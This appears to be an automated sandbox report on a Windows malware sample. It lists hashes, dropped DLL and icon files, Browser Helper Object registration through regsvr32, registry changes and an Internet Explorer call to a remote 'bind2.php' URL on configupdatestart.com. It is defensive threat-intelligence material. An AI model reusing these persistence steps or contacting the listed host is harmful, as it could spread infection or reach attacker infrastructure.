Analysis
-
max time kernel
0s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
26/12/2023, 16:26
Behavioral task
behavioral1
Sample
7c9172b18543f697525c4d7314d3a23a.exe
Resource
win7-20231129-en
General
-
Target
7c9172b18543f697525c4d7314d3a23a.exe
-
Size
161KB
-
MD5
7c9172b18543f697525c4d7314d3a23a
-
SHA1
ab2875e039b5a4cf466128f63234e0a279cdf61e
-
SHA256
75fcc9aa30238b16e1c23bde007bef2248b0638e6f419252a80dc887ef05a3ef
-
SHA512
25c5cc367ea0d5db639cf406819dd0cd0276e874d204a6351a6bf475fabc1453386f862477975ddf3de66f1fdc322a3e68b0a68c0f77b54ab79b72c82401c612
-
SSDEEP
3072:1HIENA6jJVHO585ZI/0gPQLUmTw4Pf/W8WzQJJ5ozie:ym9VHQWgPQL1rne86kJ5e
Malware Config
Signatures
-
Loads dropped DLL 1 IoCs
pid Process 2404 regsvr32.exe -
resource yara_rule behavioral1/memory/2924-29-0x0000000000400000-0x0000000000482000-memory.dmp upx behavioral1/memory/2924-1-0x0000000000400000-0x0000000000482000-memory.dmp upx -
Installs/modifies Browser Helper Object 2 TTPs 1 IoCs
BHOs are DLL modules which act as plugins for Internet Explorer.
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{A7D5DFA9-9F96-492F-B1F5-4D1385C8E034} regsvr32.exe -
Drops file in System32 directory 7 IoCs
description ioc Process File created C:\Windows\SysWOW64\sf.ico 7c9172b18543f697525c4d7314d3a23a.exe File created C:\Windows\SysWOW64\c.ico 7c9172b18543f697525c4d7314d3a23a.exe File created C:\Windows\SysWOW64\m.ico 7c9172b18543f697525c4d7314d3a23a.exe File created C:\Windows\SysWOW64\m3.ico 7c9172b18543f697525c4d7314d3a23a.exe File created C:\Windows\SysWOW64\s.ico 7c9172b18543f697525c4d7314d3a23a.exe File created C:\Windows\SysWOW64\eyfwin.dll 7c9172b18543f697525c4d7314d3a23a.exe File created C:\Windows\SysWOW64\p.ico 7c9172b18543f697525c4d7314d3a23a.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\ios.dat 7c9172b18543f697525c4d7314d3a23a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 30 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A7D5DFA9-9F96-492F-B1F5-4D1385C8E034}\ProgID regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A7D5DFA9-9F96-492F-B1F5-4D1385C8E034}\ProgID\ = "JopaBlizko.1" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A7D5DFA9-9F96-492F-B1F5-4D1385C8E034}\Programmable regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\FLAGS\ = "0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A7D5DFA9-9F96-492F-B1F5-4D1385C8E034}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JopaBlizko.1\ = "cvshost32" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\JopaBlizko\CurVer regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A7D5DFA9-9F96-492F-B1F5-4D1385C8E034}\InprocServer32\ = "C:\\Windows\\SysWow64\\eyfwin.dll" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\FLAGS regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0\win32\ = "C:\\Windows\\SysWow64\\eyfwin.dll" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A7D5DFA9-9F96-492F-B1F5-4D1385C8E034}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0\win32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\JopaBlizko.1 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\JopaBlizko regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JopaBlizko\ = "cvshost32" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JopaBlizko\CurVer\ = "JopaBlizko.1" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A7D5DFA9-9F96-492F-B1F5-4D1385C8E034} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A7D5DFA9-9F96-492F-B1F5-4D1385C8E034}\ = "cvshost32" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\JopaBlizko.1\CLSID regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\JopaBlizko\CLSID regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A7D5DFA9-9F96-492F-B1F5-4D1385C8E034}\VersionIndependentProgID\ = "JopaBlizko" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A7D5DFA9-9F96-492F-B1F5-4D1385C8E034}\InprocServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JopaBlizko.1\CLSID\ = "{A7D5DFA9-9F96-492F-B1F5-4D1385C8E034}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\ = "njdbh7 Library" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A7D5DFA9-9F96-492F-B1F5-4D1385C8E034}\VersionIndependentProgID regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JopaBlizko\CLSID\ = "{A7D5DFA9-9F96-492F-B1F5-4D1385C8E034}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A7D5DFA9-9F96-492F-B1F5-4D1385C8E034}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2924 wrote to memory of 2404 2924 7c9172b18543f697525c4d7314d3a23a.exe 16 PID 2924 wrote to memory of 2404 2924 7c9172b18543f697525c4d7314d3a23a.exe 16 PID 2924 wrote to memory of 2404 2924 7c9172b18543f697525c4d7314d3a23a.exe 16 PID 2924 wrote to memory of 2404 2924 7c9172b18543f697525c4d7314d3a23a.exe 16 PID 2924 wrote to memory of 2404 2924 7c9172b18543f697525c4d7314d3a23a.exe 16 PID 2924 wrote to memory of 2404 2924 7c9172b18543f697525c4d7314d3a23a.exe 16 PID 2924 wrote to memory of 2404 2924 7c9172b18543f697525c4d7314d3a23a.exe 16 PID 2924 wrote to memory of 2664 2924 7c9172b18543f697525c4d7314d3a23a.exe 18 PID 2924 wrote to memory of 2664 2924 7c9172b18543f697525c4d7314d3a23a.exe 18 PID 2924 wrote to memory of 2664 2924 7c9172b18543f697525c4d7314d3a23a.exe 18 PID 2924 wrote to memory of 2664 2924 7c9172b18543f697525c4d7314d3a23a.exe 18
Processes
-
C:\Users\Admin\AppData\Local\Temp\7c9172b18543f697525c4d7314d3a23a.exe"C:\Users\Admin\AppData\Local\Temp\7c9172b18543f697525c4d7314d3a23a.exe"1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /s C:\Windows\system32\eyfwin.dll2⤵
- Loads dropped DLL
- Installs/modifies Browser Helper Object
- Modifies registry class
PID:2404
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://configupdatestart.com/bind2.php?id=39131372⤵PID:2664
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2664 CREDAT:275457 /prefetch:21⤵PID:2484
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5a05829ad9a1e71563dfea34ac359db7d
SHA13d8c03c3594b8c94a2deb8f4a67c53afd7db7e3b
SHA256735e04f088e02c4a28f87ea22089f03760aad99c6cf1d575b29bd3f5716029c0
SHA5122acbf0a7e01007e17312a3e1681e0a8ceece0b2a18abbf2e2e5e09076fad9edd05dce0cd4ef13e72cfa19de1af520c3f5e7fd372c14f87146faf2e5bedcf8e1e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5a1635c58d736fdf26c4f5a8f24edfdc7
SHA125c1335feb9994c86b3b0b5bc93b2164517e26fa
SHA256b59c88404fc06355e9ed2fbbafe408fcbc7d15f1e44d63720444049d03eeee43
SHA512f09ea7663939b62b69bd5314a0c9e2d8bff52d904f9d30ce11e394c5a3b22488eec76d81ec32ebfd0ce6dbeb7966bff9cfbd039b8b368a87e28bfed199ae4c5f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD51b0680664fbe1740882776655610e31a
SHA10aa30aad3b8b13a763a4073604b34b15548e1be1
SHA256298908380e9b4b52ea8de682c013fa0ba3d0f10311cf6b82b35481c22fb1640a
SHA512735cd17ff8e758cdff8c51d963012d18a01e0df5427928c75a46e4c31564749bd9803eb50ae1f1e62d95312467acdb18692cab572b82d9f47ea6a9e86802e11a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD58c93aef911dbab3f6d22a64f25098127
SHA16c4da118de5608e66d633f7b791f8619906fa5d8
SHA2568016be502cd4eef3be5f0f41857a229b244b748a4227e7d45d4b780214865be1
SHA51262fee77b5178467328af4115ef80192eb45872ffedca4f4f2b2040985108ba6597f91dcbca7b7535e3700dd36aaa425303bd9341d85ad341878566e467c4a6a7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5b2a46558019d89196d2e52694265080f
SHA189bf0c40357ba3b3e749937fa637abb0a3c2ef9b
SHA2563e1f09a09f36c82e8de6cafe18a3a868ca0e034acf1583977ec3ab2dfa1d3aed
SHA512191c227a3a9e80c7745da73fa09113dd675c7d491d11c58f89bd5ad12018029841bb4404f09dc32aae474ffeae22dba7b04b8041acb03272f2068b260de57d02
-
Filesize
272KB
MD5350389796f77883f91933203ca6aa448
SHA149c470a38b7e48a4b9a673580f22b4aa8268016d
SHA256977818d61f8a496bfafca28023b7aa2556231027bbd09cd20ff9abaef728cfb5
SHA512842ed73aba67e7b79c2cc7c8f7e39c2fafa6dd5e0983388c8b30dd02e2af9a5bab466cb3b7e65b4d9c0151d93fd49858b00fcd18d0baf70a87ee5721d8b17bd3